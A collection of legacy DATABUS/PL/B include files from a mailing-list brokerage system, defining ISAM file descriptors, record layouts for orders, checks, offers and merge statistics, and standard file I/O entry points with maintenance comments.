. DESCRIPTION : KEY UPDATE MDC MainFILE
.
M2NLoUPD BRANCH M2NLoFlag TO M2NLo6
CALL M2NLoOpen
M2NLo6
FILEPI 1;M2NLoFlist
UPDATE M2NLoFlist;M2NLoVars
RETURN
..............................................................................
.
. ENTRY POINT : M2NLoDEL
. REQUIRED : 'M2NLoFld'
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI DELETE
.
M2NLoDEL BRANCH M2NLoFlag TO M2NLo7
CALL M2NLoOpen
M2NLo7 FILEPI 1;M2NLoFlist
DELETE M2NLoFList
RETURN
..............................................................................
.
. ENTRY POINT : M2NLoOpen
. REQUIRED : 'M2NLoFlag' 'M2NLoPATH'
. RETURNED     : 'M2NLoFlag' SET TO '1' IF OPENED
. DESCRIPTION : OPEN NIN MDC MainFILE
. DISPLAY ERROR AND ABORT IF NOT ON-LINE.
.
M2NLoOpen TRAP M2NLoGONE giving error IF IO
OPEN M2NLoFList
TRAPCLR IO
MOVE C1 TO M2NLoFlag
RETURN
..............................................................................
M2NLoGONE MOVE M2NLoNAME TO FILENAME
CALL FILEGONE
.
..............................................................................
<file_sep>/include/RobbSaves/apptop.inc
///////////////////////////////////////////////////////////////////////////////
//
// Program: apptop.inc
//
// Author: <EMAIL>
//
// Copyright: © 2004 Adjacency Consulting Group, Inc. All rights reserved.
//
// Date: 3 December 2004
//
// Purpose: Encapsulate required top-of-program inclusions
//
// Revision:
// ver03 29 DEC 2005 ASH - ADDED WEBSITE TRACKING FILE
// ver02 13 DEC 2005 ASH - ADDED CONSULTANT FILE
// ver01 03 DEC 2004 BJACKSOn
//
///////////////////////////////////////////////////////////////////////////////
include common.inc
include cons.inc
include cntdd.inc
include compdd.inc
include ndatdd.inc
include nxrfdd.inc
include norddd.inc
.START PATCH 02 ADDED LOGIC
include ncltdd.inc
.END PATCH 02 ADDED LOGIC
.START PATCH 03 ADDED LOGIC
include nwebdd.inc
.END PATCH 03 ADDED LOGIC
include user.io
include \\nins1\e\library\include\RobbSaves\CGILibrary.inc
include sessionmgmt.inc
///////////////////////////////////////////////////////////////////////////////
RELEASE INIT "PHASE II"
///////////////////////////////////////////////////////////////////////////////
<file_sep>/include/NMLCIO.INC
*******************************************************************************
* NMLCIO/INC - I-O INCLUDE FOR MLRCATS FILE. *
*******************************************************************************
* CREATED - 03/07/91 *
*******************************************************************************
.
. NMLCKEY: random read of MLRCATS by exact ISAM key (NMLCFLD).
. Opens the file on first use (NMLCFLAG clear), then reads
. NMLCNUM and NMLCCAT under a FILEPI file-protect region.
NMLCKEY BRANCH NMLCFLAG TO NMLC1
CALL NMLCOPEN
NMLC1 FILEPI 1;NMLCFILE
READ NMLCFILE,NMLCFLD;NMLCNUM:
NMLCCAT
RETURN
..............................................................................
. NMLCTST: key-existence test - reads only STR1 for the key in
. NMLCFLD (no record fields transferred).
. NOTE(review): the I/O list ends with ';' here while the other
. entry points continue with ':' - presumably intentional
. (remainder of record ignored); confirm.
NMLCTST BRANCH NMLCFLAG TO NMLC2
CALL NMLCOPEN
NMLC2 FILEPI 1;NMLCFILE
READ NMLCFILE,NMLCFLD;STR1;
RETURN
..............................................................................
. NMLCKS: sequential read (SEQ) - returns the next record's
. NMLCNUM/NMLCCAT in key order; opens the file on first use.
NMLCKS BRANCH NMLCFLAG TO NMLC3
CALL NMLCOPEN
NMLC3 FILEPI 1;NMLCFILE
READ NMLCFILE,SEQ;NMLCNUM:
NMLCCAT
RETURN
.
..............................................................................
.
. NMLCWRT: write NMLCNUM/NMLCCAT at the exact ISAM key in
. NMLCFLD, under FILEPI; opens the file on first use.
NMLCWRT BRANCH NMLCFLAG TO NMLC5
CALL NMLCOPEN
NMLC5 FILEPI 1;NMLCFILE
WRITE NMLCFILE,NMLCFLD;NMLCNUM:
NMLCCAT
RETURN
..............................................................................
.
. NMLCDEL: delete the record addressed by the exact ISAM key in
. NMLCFLD, under FILEPI; opens the file on first use.
NMLCDEL BRANCH NMLCFLAG TO NMLC7
CALL NMLCOPEN
NMLC7 FILEPI 1;NMLCFILE
DELETE NMLCFILE,NMLCFLD
RETURN
..........................................................................
. NMLCOPEN: open MLRCATS by name (NMLCNAME) with an IO trap so a
. failed OPEN transfers to NMLCGONE; on success the trap is
. cleared and NMLCFLAG is set so later entries skip the OPEN.
NMLCOPEN TRAP NMLCGONE IF IO
OPEN NMLCFILE,NMLCNAME
TRAPCLR IO
MOVE C1 TO NMLCFLAG
RETURN
.............................................................................
. NMLCGONE: IO-trap target for NMLCOPEN - reports the missing
. file name via the shared FILEGONE routine.
NMLCGONE MOVE NMLCNAME TO FILENAME
CALL FILEGONE
..............................................................................
.<file_sep>/include/SRDSTXTdd.inc
.******************************************************
.* SRDS List FILE DESCRIPTORS.
.. ....................................................
.* ****************************************************
.* SRDS DATACARD FILES.
.* ****************************************************
.
. FILE: SRDS_TXT
. LENGTH:
. COMPRESS: NONE
. TYPE: XML from SRDS; if there is not a hit
. on our system, the records are put into an indexed/aimdexed file for review
......................................................
. LAST MODIFIED
. patch 1.0 14 September 2011 DLH New
......................................................
.
. SRDS_TXT file list and working storage: two fixed-58 ISAM
. files plus name/flag/path/lock cells. SRDStxtFLd (6) holds a
. partial key (list number only); SRDStxtFLd1 (8) holds the full
. key - presumably LSTNUM+NUM per the KEY remarks below; verify.
SRDSTXTFList Filelist
SRDSTXTFILE IFILE fixed=58,Name="SRDS_TXT.Isi|NINS1:502"
SRDSTXTFLE1 IFILE fixed=58,Name="SRDS_TXT1.Isi|NINS1:502"
FilelistEND
SRDSTXTNAME Init "SRDS_TXT|NINS1:502"
SRDSTXTFLAG FORM 1
SRDSTXTPATH FORM 1
SRDStxtLock FORM 1
SRDStxtFLd Dim 6
SRDStxtFLd1 Dim 8
.
. SRDStxtVARS: 58-byte record layout (key = bytes 1-8).
SRDStxtVARS LIST .
SRDSTXTLSTNUM DIM 6 1-6 ZERO FILLED KEY.
SRDSTXTNUM DIM 2 7-8 ZERO FILLED KEY.
SRDSTxt DIM 50 9-58 misc unformated pricing info
.SRDSTxt DIM 250 9-258 misc unformated pricing info
. will be prepended to data card text? from a new datacard file
LISTEND
<file_sep>/DEVELOP/Includes - why/NOFRDD.INC
..............................................................................
.
. NOFRDD INCLUSION
. NIN OFFER FILE DEFINITION
.
. FILE NAME : NINOFR
. REC LENGTH: 68 FIXED (was 66 before patch 1.1)
. INDEX KEY : 2-10 (6 POSITION MLR#, 3 POSITION OFFER#; was 2-8 pre-patch 1.1)
.
. RElease 1.2 24Apr07 DLH added file manager
. RELEASE 1.1 17OCT02 ASH ADDED AIM FILE FUNCTIONALITY
..............................................................................
.
. NINOFR file list (patch 1.1): ISAM + AIM pair, 68-byte fixed
. records, KEYLEN=9 (key = bytes 2-10: OFMLR + OFNUM below).
. NOFRFLD/NOFRFLD1 are 9-byte key work areas.
.START PATCH 1.1 REPLACED LOGIC
.NOFRFILE IFILE KEYLEN=7,FIXED=64,UNCOMP
NOFRFLIST FILELIST
NOFRFILE IFILE KEYLEN=9,FIXED=68,UNCOMP,Name="NINOFR.ISI|NINS1:502"
NOFRFLE2 AFILE FIXED=68,UNCOMP,Name="NINOFR.AAM|NINS1:502"
FILELISTEND
.END PATCH 1.1 REPLACED LOGIC
NOFRNAME INIT "NINOFR|NINS1:502 "
NOFRFLD DIM 9
.START PATCH 1.1 REPLACED LOGIC
NOFRFLD1 DIM 9
.END PATCH 1.1 REPLACED LOGIC
NOFRFLAG FORM 1
NOFRLOCK FORM 1 0 or 1=File locks, 2=Record locks, 3=no locks
* ....................................................
.
. ofrvars: 68-byte offer record; OFDATE widened 6->8 (CCYYMMDD)
. per the commented-out pre-Y2K line.
ofrvars list
OFCODE DIM 1 1-1 'R'
OFMLR DIM 6 2-7 MAILER NUMBER KEY.
OFNUM DIM 3 8-10 OFFER NUMBER KEY.
OFDESC DIM 40 11-50 OFFER DESCRIPTION.
OFNAME DIM 10 51-60 LAST UPDATED BY.
.OFDATE DIM 6 59-64 DATE LAST UPDATED.
OFDATE DIM 8 61-68 DATE LAST UPDATED.
listend
...............................................................................
LISTOFF
.PROGRAM ACCESS.
.NAME TYPE ACCESS
.NLCR0011 DATABUS
.NDAT0010 DATABUS
.NDAT0012 DATABUS
.NDIV0001 DATABUS
.NDIV0002 DATABUS
.EPSSPOOL DATABUS
.NLCR0009 DATABUS
.NORD0009 DATABUS
.NAPR0001 DATABUS
.NLCR0001 DATABUS
.NORD0001 DATABUS
.NOFR0001 DATABUS
.PAYORDERPRT DATABUS
.SPOOLLCRS DATABUS
.NORD0023 DATABUS
.NORD0024 DATABUS
.WARSPOOL DATABUS
.WARVIEW DATABUS
.NDAT0004 DATABUS
.NAPR0002 DATABUS
LISTON
<file_sep>/include/MD090DD.INC
.* MIN List FILE DESCRIPTORS.
.. ....................................................
.* ****************************************************
.* MIN DATACARD FILES.
.* ****************************************************
.
. FILE: MDC_M090
. LENGTH: Variable
. COMPRESS: NONE
. TYPE: FLAT Comma Delimited
......................................................
. LAST MODIFIED
. patch 1.0 14 August 2006 DLH New
.Main file
.MDCMaindd
.Secondary FIles See
.MDCSEGDD - Segment info universe & $
.MDSMSCDD - Misc addressing Min, UOS,Gender,Media,net
.MDC090DD - Category (sic - listed as MDC035DD in NMDCMSCDD; verify)
.MDC091DD - Owner ???? data not supplied
.MDC090DD - Owner
.MDCTXTDD - Text
......................................................
. MDC_090 list-owner (LO) definitions. M090NAME is a 12-byte
. work area (name supplied at run time), unlike sibling includes
. that use INIT. M090SFILE has no Name= - presumably opened with
. a run-time name (see the commented CSV line); confirm callers.
M090NAME DIM 12
M090FILE IFILE Name="MDC_090C.isi|NINS1:502"
M090SFILE FILE
.M090SFILE FILE Name="MDC_090.csv"
M090FLd Dim 5
M090FLAG FORM 1
M090PATH FORM 1
.
. M090VARS: only GKEY carries byte positions (1-5, matches the
. 5-byte M090FLd key); the rest are sized for the comma-
. delimited source fields.
M090VARS LIST .for ease I am using Min's names
GKEY Dim 5 1-5 LO Code#
GNAM Dim 25 Name
GAD1 Dim 25 Address 1
GAD2 Dim 25 Address 2
GCTY Dim 20 City
GSTT Dim 2 State
GZIP Dim 10 Zip
GCTR Dim 25 Country
GCNT Dim 25 Contact
GPH1 Dim 11 Phone
GPH2 Dim 11 Phone
GPHF Dim 11 FAX
GPHM Dim 11 Modem
GDLT Dim 1 'A'ctive/'I'nactive
ListEnd
<file_sep>/DEVELOP/Includes - why/nchkddnew.inc
..............................................................................
.
. NCHKDD INCLUSION
.
. FILE NAME : NINCHK.DAT
. REC LENGTH: 129
. INDEX KEY : 1-36 CONTROL NUMBER + CONTROL DATE + CHECK NUMBER
. AAMDEX KEY: 1-11 CONTROL NUMBER/CONTROL DATE
. 12-36 CHECK NUMBER
. 45-59 AMOUNT
. 60-104 PAYOR
..............................................................................
.
. NINCHK file list: ISAM + AIM pair (key/length now carried by
. the .ISI/.AAM files themselves - see the commented pre-managed
. declarations). NCHKFLD* are key work areas of various widths.
NCHKLIST Filelist
.NCHKFILE IFILE KEYLEN=36,FIXED=129,NODUPLICATES
.NCHKFLE2 AFILE FIXED=129
NCHKFILE IFILE NAME="NINCHK.ISI"
NCHKFLE2 AFILE NAME="NINCHK.AAM"
Filelistend
NCHKNAME INIT "NINCHK"
NCHKFLD DIM 36
NCHKFLD1 DIM 14
NCHKFLD2 DIM 28
NCHKFLD3 DIM 18
NCHKFLD4 DIM 48
NCHKFLAG FORM 1
NCHKlock form 1 0 or 1 - filepi, 2 =record locking, = no locks
..............................................................................
. NCHKVARS: 129-byte check record; index key = bytes 1-36
. (control number + control date + check number).
NCHKVARS list
NCHKCONT DIM 3 1-3 CONTROL NUMBER (KEY) (AAMKEY)
NCHKCONTD DIM 8 4-11 CONTROL DATE (AAMKEY)
NCHKNUM DIM 25 12-36 CHECK NUMBER (KEY) (AAMKEY)
NCHKDATE DIM 8 37-44 CHECK DATE - CCYYMMDD
NCHKAMT FORM 12.2 45-59 CHECK AMOUNT
NCHKPAYOR DIM 45 60-104 CHECK PAYOR
NCHKFILL DIM 25 105-129 FILL
listend
<file_sep>/include/NCKIDD.inc
..............................................................................
.
. NCKIDD INCLUSION
. NIN MANUAL CHECK FILE DEFINITION
.
.CREATED 12JUL93
.
. FILE NAME : CHKINFO
. REC LENGTH: 44 FIXED
.
. AIM KEYS : 01-06 INVOICE NUMBER
.begin patch 1.1
.. 08-13 OLD CHECK NUMBER (old values)
.. 20-25 NEW CHECK NUMBER (old values)
. 08-13 OLD CHECK NUMBER (new values)
. 22-27 NEW CHECK NUMBER (new values)
.end patch 1.1
.patch 1.1 27 DLH NININV Y2k
..............................................................................
.
. CHKINFO manual-check file (patch 1.1 / Y2K widths).
. NOTE(review): NCKIFILE is FIXED=75 but NCKIFLE1 is FIXED=74 -
. confirm which record length is correct.
.begin patch 1.1
.NCKIFILE FILE FIXED=45
.NCKIFLE1 AFILE FIXED=45
NCKIFILE FILE FIXED=75
NCKIFLE1 AFILE FIXED=74
.end patch 1.1
NCKINAME INIT "CHKINFO "
.
NCKIFLD DIM 9
NCKIFLD2 DIM 9
NCKIFLD3 DIM 9
NCKIFLAG FORM 1
NCKIFLG1 FORM 1
NCKIPATH FORM 1
.
. NCKIVARS: record layout. NOTE(review): the position remarks on
. NCKIAP1 (037-048) and NCKIAP2 (048-061) overlap at byte 048,
. and NCKIAP3's remark reads "A/P2" - presumably A/P3; verify
. the byte offsets against the physical record before relying
. on them (a FORM 10.2 occupies 13 bytes, not 12).
NCKIVARS LIST
NCKIINV DIM 6 001-006 INVOICE NUMBER REQUIRED, KEY 1.
NCKISTAT FORM 1 007-007 4="MANUAL ISSUED", 3="VOID".
. 2=VOID/CONTRA, 1=VOID/REISSUE.
. 5="MANUAL ISSUED ON OPEN INV"
NCKIONUM DIM 6 008-013 CHECK NUMBER VOIDED, KEY 2.
.begin patch 1.1
.NCKIDTE DIM 6 014-019 DATE OF OLD CHECK.
NCKIDTE DIM 8 014-021 DATE OF OLD CHECK. ccyymmdd
.end patch 1.1
NCKINNUM DIM 6 022-027 NEW CHECK NUMBER, KEY 3.
.NCKIDATE DIM 6 026-031 DATE ENTERED
.begin patch 1.1
NCKIDATE DIM 8 028-035 DATE ENTERED
.NCKIAP1 DIM 7 037-042 A/P1
.NCKIAP2 DIM 7 043-049 A/P2
NCKIAP1 form 10.2 037-048 A/P1
NCKIAP2 form 10.2 048-061 A/P2
NCKIAP3 form 10.2 062-074 A/P2
.end patch 1.1
LISTEND
..............................................................................*
LISTOFF
.PROGRAM ACCESS.
.NAME TYPE ACCESS
LISTON
<file_sep>/include/LOGDATA.INC
* .............................................................................
. THE LOG ENTRYS TYPE:
. LOG-ON .........USER SIGN ON
. LOG-OFF.........USER SIGN OFF
. BAD ID..........INVALID ATTEMPT TO SIGN ON
. ERROR...........DATASHARE ERROR
. PROGRAM.........SUCCESSFUL CHAIN TO PROGRAM
. NO PROGRAM .....UNSUCCESSFUL CHAIN TO PROGRAM
* .............................................................................
.logfile.dat
. Log file (140-byte fixed records) plus work variables used to
. unpack port/task information; the ';'-prefixed lines are
. conditionally compiled (IFZ/IFNZ PC).
LOGFILE FILE Fixed=140
LOGTYPE DIM 10
LOGINFO DIM 20
LogFlag form 1
* .............................................................................
.SEQ FORM "-1" USE VARS FROM CONS.INC
.SEQ3 FORM "-3"
LOGPORT DIM 24 1-24
LOGRN FORM 4 25-28
ZERO FORM "0" 29-29
SUBDIRCT DIM 6 30-35
LOCKSW DIM 1 36-36
PROC DIM 2 37-38
PORT DIM 2 39-40
PORTTYPE DIM 2 41-42
PORTSCRN DIM 2 43-44
PORTUDA DIM 5 45-49
FILL DIM 1 50-50 *USED FOR UNPACK OF PORT.
PORTINFO DIM 40 51-90 *USED FOR CLOCK OF PORT.
TASK DIM 12 91-102 *USED FOR UNPACK OF PORTINFO, = TASK NAME
NODE DIM 12 103-114 * " " " " " , = NODE NAME
; IFZ PC
ATTRIB DIM 16 115-130 * " " " " " , = ATTRIBUTES OF PORT.
;user dim 10 131-140
; XIF
; IFNZ PC
;ATTRIB DIM 11 * " " " " " , = ATTRIBUTES OF PORT.
; XIF
. Column headers for the log listing report.
HEADER INIT "* NODE TASKNAME LOG TYPE DATE "
HEADER1 INIT " TIME OTHER INFO"
HEADER2 INIT "* ==== ======== ======== ==== "
HEADER3 INIT " ==== =========="
* END OF INCLUDE.
. ................
<file_sep>/DEVELOP/Includes - why/nord2dd.inc
..............................................................................
.
. NORD2DD INCLUSION
. NIN ORDER FILE DEFINITION (CREATED FROM THE ORDERPIC PROGRAM)
.
. FILE NAME : ? (SUPPLIED BY USER)
. REC LENGTH: 498 VAR
. WAS REC LENGTH: 384 VAR PATCH #6
. WAS REC LENGTH: 344 VAR
. WAS REC LENGTH: 319 VAR
. patch 22 order file conversion mailer et al
. Patch 9.1 DLH 09Jan2007 add OCompID
. Patch 9 DLH 12September2006 add OFulFIll 6 byte Fulfillment company#
. PATCH 8 ASH 19MAR01 NINORD ADDED TO FILE MANAGER
. PATCH 7 ASH 04May99 Added var for Exchange Price
. PATCH 6 ASH 08JAN99 NINORD Y2K, File expansion
. patch 5 DLH 28Sep98 add new ostat & cancodes for Pending orders
..13Aug98 ASH increased record size to account for increase in var size w/ Broker Y2K
..17oct94 DLh proposed change adding net info expand record to 344.
..............................................................................
.
. Order extract file: 498-byte variable-length, compressed.
. NORDNAME is blank - the file name is supplied by the user at
. run time (see "SUPPLIED BY USER" in this include's header).
NORDFILE FILE VAR=498,COMP
.START PATCH 8 REPLACED LOGIC
.NORDNAME INIT " "
NORDNAME INIT " "
.END PATCH 8 REPLACED LOGIC
NORDFLAG FORM 1
.
. ORD2VARS: record layout for the 498-byte order extract
. created by the ORDERPIC program. Positions are 1-based byte
. offsets. Lower-case OSTAT/OHIST codes denote pending/LCR
. states (patch 5); Ofill1/2/3/4 reserve bytes for the patch-22
. company-number conversions.
ORD2VARS List
ORCODE DIM 1 001-001 ORDER CODE, "S"
OSTAT DIM 1 002-002 STATUS, 0,B,Q,X,p,x,l,z
. 0-Live order
. B-Billed order
. Q-Cancelled/Billed order
. X-Cancelled order
. e-Live Order with Estimated Invoice uses "X" if cancelled
.patch 5 New values for OSTAT p Lower case = Pending order (awaiting LO/manager Approval)
. x Lower case = Cancellation of above (never approved)
. l Lower case = LCR
. z Lower case = Cancellation of LCR
..................................................
.WILL NEED TO BE UPDATED WHEN CLIENT FILE IS FINISHED
.begin patch 22
Ofill1 Dim 2 003-004 for company # (mailer conversion DOne) ** New
.end patch 22
OMLRNUM DIM 4 005-008 MAILER NUMBER, AIM KEY 1
..................................................
OLRN DIM 6 009-014 LR NUMBER, KEY
OCOBN DIM 3 015-017 CONTACT # (NIN) OR BROKER # (CMP)
OLNUM DIM 6 018-023 LIST NUMBER, AIM KEY 2
..................................................
.WILL NEED TO BE UPDATED WHEN CLIENT FILE IS FINISHED
.begin patch 22
Ofill2 Dim 2 024-025 for company # (Owner conversion DOne) ** New
OLON DIM 4 026-029 LIST OWNER NUMBER
OwnCtn Dim 3 030-032 Owner COntact ** New
.end patch 22
..................................................
OMLRPON DIM 12 033-044 MAILER PURCHASE ORDER NUMBER was 7
OQTY DIM 9 045-053 QUANTITY, X,XXX,XXX
OPPM DIM 5 054-058 PRICE PER THOUSAND, XXX.XX
OMLRKY DIM 12 059-070 MAILER'S KEY
OFOCODE DIM 2 071-072 FURNISHED-ON CODE, 0,1,2,3,4,5,6,7,8,OR 9
ORTNDTEC DIM 2 073-074 RETURN DATE (CENTURY)
ORTNDTEY DIM 2 075-076 RETURN DATE (YEAR)
ORTNDTEM DIM 2 077-078 RETURN DATE (MONTH)
ORTNDTED DIM 2 079-080 RETURN DATE (DAY)
OMDTEC DIM 2 081-082 MAIL DATE (CENTURY)
OMDTEY DIM 2 083-084 MAIL DATE (YEAR)
OMDTEM DIM 2 085-086 MAIL DATE (MONTH)
OMDTED DIM 2 087-088 MAIL DATE (DAY)
OTOCODE DIM 1 089-089 TEST ORDER CODE, "1"
OSOTCODE DIM 1 090-090 SELECTION ON TEST CODE, 1,2 OR 3
OCCODE DIM 1 091-091 CONTINUATION CODE, "1"
OLRNCO DIM 6 092-097 LR NUMBER OF CONTINUATION CODE
OODTECOC DIM 2 098-099 ORDER DATE OF CONTINUATION CODE (CENTURY)
OODTECOY DIM 2 100-101 ORDER DATE OF CONTINUATION CODE (YEAR)
OODTECOM DIM 2 102-103 ORDER DATE OF CONTINUATION CODE (MONTH)
OODTECOD DIM 2 104-105 ORDER DATE OF CONTINUATION CODE (DAY)
OQTYCO DIM 9 106-114 QUANTITY OF CONTINUATION ORDER, XXX,XXX,XXX
OSPI DIM 24 115-138 SPECIAL INSTRUCTION CODES, MAX.6 (2 DIGIT)
OBildrct DIM 1 139-139 Placed as bill direct? y=yes n=no ' '=no
OBRKGUAR DIM 1 140-140 BROKER GUARANTY, '1' = 30 DAY.
. '2' =45 DAY, '3' =60 DAY, '4' = NO DATE
OELCODE DIM 1 141-141 ENTIRE LIST CODE
. 1=RENT/ENTIRE,2=EXCH,3=EXCHANGE/ENTIRE
OODNUM DIM 7 142-148 OFFER DeSCRIPTION NUMBER
OODES DIM 5 149-153 OFFER DESCRIPTION
ONETQTY DIM 9 154-162 ORDER NET QUANTITY
OCAMP DIM 6 163-168 ASSOCIATED CAMPAIGN
OCLRSTAT DIM 1 169-169 CLEARANCE STATUS 1=EXCHANGE, 2=RENT, 3=EXC/SPLIT, 4=DENIED
OCLRINIT DIM 3 170-172 INITS OF PERSON WHO CLEARED LCR
OBRKRPT DIM 1 173-173 OUTSIDE BROKER NOTIFIED OF CLEARANCE STATUS? 1=YES, B1=NO
OCLRDTEC DIM 2 174-175 CLEAR DATE (CENTURY)
OCLRDTEY DIM 2 176-177 CLEAR DATE (YEAR)
OCLRDTEM DIM 2 178-179 CLEAR DATE (MONTH)
OCLRDTED DIM 2 180-181 CLEAR DATE (DAY)
ORENT DIM 1 182-182 LCR REQUEST FOR RENT "1" = YES
OHIST DIM 1 183-183 ORDER HISTORY "l"-LCR to Live, "L"-In-House LCR to Live, "p"-Pending to Live
. IN-HOUSE LCR's: "e"-Waiting for Clearance
. "E"-Cleared
. "*"-Faxed to Owner
. "z"-Denied
OXPPM DIM 5 184-188 EXCHANGE PRICE PER THOUSAND, XXX.XX
.begin patch 22
oFILL3 dIM 2 189-190 FOR CONVERSION OF COMP-RETURN-TO ** New
.enD patch 22
ORTNNUM DIM 4 191-194 RETURN-TO NUMBER
..................................................
OTAPERET DIM 1 195-195 TAPE-RETURNABLE ?
OUQTY DIM 9 196-204 UNIVERSE QUANTITY, XXX,XXX,XXX
OSALES10 DIM 1 205-205 TENS DIGIT OF SALESMAN #.
OSALES DIM 1 206-206 ONES DIGIT OF SALESMAN CODE
OCOCODE DIM 2 207-208 CONTACT CODE, 1,2,3, OR 4
OCO2CODE DIM 2 209-210 CONTACT CODE, 1,2,3, OR 4
OODTEC DIM 2 211-212 ORDER DATE (CENTURY)
OODTEY DIM 2 213-214 ORDER DATE (YEAR)
OODTEM DIM 2 215-216 ORDER DATE (MONTH)
OODTED DIM 2 217-218 ORDER DATE (DAY)
OSCODE DIM 1 219-219 SAMPLE CODE, 1=sample enclosed,2=sample to follow, OR 3=sample prev approved
OCOMSLCT DIM 1 220-220 overlay: COMSELECT='C', lifestyle="L"
. (LSVCS)
OSHP DIM 2 221-222 SHIPPED VIA CODE, 0,1,2...9.
O1DES DIM 35 223-257 LINE #1 OF LIST DESCRIPTION, DATACARD
O2DES DIM 35 258-292 LINE #2 OF LIST DESCRIPTION, KEYIN
OREUSE DIM 6 293-298 RE-USE LR #, RTN-TO # WILL BE '0'
ODOWJ DIM 3 299-301 TYPISTS INITIALS was 2
OEXQTY DIM 9 302-310 EXCHANGE QTY ON SPLIT ORDER.
GUARCODE DIM 1 311-311 NIN GUARANTY CODE, '1' = 30 DAY.
. '2' =45 DAY, '3' =60 DAY, '4' = NO DATE
. '5' =NOT USED, '6'=REC'D PREPAY,
. '7' REC'D PRE 30-DAY, '8' REC'D PRE 60,
. '9' =REC'D PRE 60 DAY.
..................................................
.WILL NEED TO BE UPDATED WHEN CLIENT FILE IS FINISHED
.begin patch 22
oFILL4 dIM 2 312-313 .FOR CONVERSION OF BRK/CONSULT
.enD patch 22
OBRKNUM DIM 4 314-317 BROKER/CONSULTANT NUMBER.
OBRKCNT DIM 3 318-320 BROKER/CONSULTANT CONTACT NUMBER.
..................................................
osamcde dim 3 321-323 sample numbers
onetper dim 2 324-325 net name percentage (NN = Net Name)
onetrc form 3.2 326-331 net name running charge
onetfm dim 1 332-332 net flag (F)lat'volume', per (M)'net', (N)o
. deducts allowed by Lo.
.
onetmin form 7 333-339 net name minimum.
OFullFil Dim 6 340-345 Fullfilment number
OCompID Dim 1 346-346 Brokerage Company ID 'N' or ' '= NIN 'P' = Pacific lists
OCompID2 Dim 1 347-347 Management Company ID 'N' or ' '= NIN 'P' = Pacific lists
.begin patch 22
.ofiller dim 72 337-408
ofiller dim 61 348-408
ORDmNAME DIM 45 409-453 Broker NAME (ELSE blank)
ORDcNAME DIM 45 454-498 MAILER NAME (ALWAYS)
* .......................................................................
Listend
<file_sep>/include/nmrgdd.inc
* *****************************************************************************
* NAMES IN THE NEWS MASTER MERGE FILE.
* *****************************************************************************
.
. FILE: NINMERGE
. LENGTH: 465
.COMPRESS: YES
. TYPE: ISAM
. KEY: NMRGFLD
. JD 17Sep2007 added new var nmrgcnr
. DLH 8Feb2007 FIle manager
. JD 05DOct5 Disaster deduct created.
. JD 09Dec04 DPV no longer valid deduct.
. JD 24JUn04 record expanded.
. JD 24aug95 added new variable.
. DLH 6JAN93 CREATED
...............................................................................
.19April 08 DH remove compression add no dupe
.MinXFILE IFILE KeyLen=6,FIXED=20,Name="Min2NIN.ISI|NINS1:502"
.NMRGFILE IFILE KEYLEN=6,COMP,VAR=401
.NMRGFILE IFILE KEYLEN=6,COMP,VAR=465,Name="NINMERGE.ISI|NINS1:502"
. NINMERGE master merge file: variable-465, 6-byte key (LR#),
. NODUPE (compression removed 19Apr08 per the note above);
. NMRGFLE1 is the daily print file.
NMRGFILE IFILE KEYLEN=6,NODUPE,VAR=465,Name="NINMERGE.ISI|NINS1:502"
NMRGFLE1 IFILE KEYLEN=6,Name="NINMRGE.ISI|NINS1:502"
.........NOTE .DAILY PRINT FILE LEN 9
.NMRGFILE IFILE KEYLEN=6,COMP,VAR=465
.NMRGFLE1 IFILE KEYLEN=6 .DAILY PRINT FILE LEN 9
NMRGNAME INIT "NINMERGE.ISI|NINS1:502"
NMRGNME1 INIT "NINMRGE.ISI|NINS1:502"
NMRGFLD DIM 6
NMRGFLAG FORM 1
NMRGPATH FORM 1
*
. NMRGVAR: merge-statistics record; counters are FORM 8 fields
. laid out in fixed byte positions, key = NMRGLR (bytes 1-6).
NMRGVAR LIST
.
. BEGINNING OF VARIABLE LIST.
.
NMRGLR DIM 6 001-006 LR NUMBER. **KEY**
NMRGFILL DIM 4 007-010 FILL.
NMRGLNAM DIM 49 011-059 LIST NAME.
NMRGKCOD DIM 10 060-069 KEY CODE.
NMRGRQTY FORM 8 070-077 QTY REC'D
NMRGIQTY FORM 8 078-085 QTY INPUT
NMRGTREJ FORM 8 086-093 TOTAL REJECTS
NMRGID FORM 8 094-101 INTRA DUPES.
NMRGNETI FORM 8 102-109 NET INPUT.
NMRGELIM FORM 8 110-117 ELIMINATOR HITS
NMRGHDRP FORM 8 118-125 HOUSE DROPS *NEW
NMRGCS FORM 8 126-133 CUSTOMER SUPPRESS *THEse 2 fields were
NMRGUDUP FORM 8 134-141 UNUSED DUPLICATES *swapped, early 94?.
NMRGND FORM 8 142-149 NON DUPLICATES
NMRGDUPM FORM 8 150-157 DUPLICATES (MULTIES)
NMRGNET FORM 8 158-165 NET OUTPUT
NMRGZIPV FORM 8 166-173 ZIPS VERIFIED
NMRGZIPC FORM 8 174-181 ZIPS CORRECTED
NMRGZIP4 FORM 8 182-189 ZIP+4 CRRT CODED
NCOAMWF FORM 8 190-197 NCOA MTCH W/FWD
NCOAMNF FORM 8 198-205 NCOA MTCH NO/FWD
NCOATOTM FORM 8 206-213 TOT NCOA MTCH
NIXIEM FORM 8 214-221 NIXIE OPT MTCH
NCOAUNM FORM 8 222-229 NCOA UNMTCHED
NCOANFRJ FORM 8 230-237 NCOA NO/FWD REJECTS *NEW
NCOANIX1 FORM 8 238-245 NCOA NIXIE 1 REJECTS *NEW
NCOANIX2 FORM 8 246-253 NCOA NIXIE 2 REJECTS *NEW
NCOANIX3 FORM 8 254-261 NCOA NIXIE 3 REJECTS *NEW
NMRGERR FORM 8 262-269 ERROR REJECTS.
NMRGDISF FORM 8 270-277 DEAD REJECTS.
NMRGNPER FORM 8 278-285 NONPERSONAL REJECTS
NMRGDMA FORM 8 286-293 DMA REJECTS
NMRGELMX FORM 8 294-301 ELIMINIX REJECTS
NMRGZ4 FORM 8 302-309 ZIP+4 CRRT REJECTS
NMRGNIX FORM 8 310-317 NIXIE REJECTS
NMRGTDMC FORM 8 318-325 TDMC REJECTS.
.NMRGEXIT FORM 8 326-333 EXIT REJECTS *no longer used
NCOAREJ FORM 8 326-333 NCOA REJECTS *new field NIXIE OPT.
NMRGCUST FORM 8 334-341 CUSTOMER REJECTS
NMRGPRIS FORM 8 342-349 PRISON REJECTS
NMRGDROP FORM 8 350-357 MAILDROP REJECTS
NMRGHH FORM 8 358-365 DROPED BY HOUSE HITS *NEW
NMRGFAM FORM 8 366-373 FAMILY DUPE DROPS *NEW
nmrgconv form 8 374-381 Epsilon conversion drops - includes
. military, bad address,
NMRGFIL1 DIM 4 382-385 NOT USED.
nmrgrep form 8 386-393 republican hits (DNC)
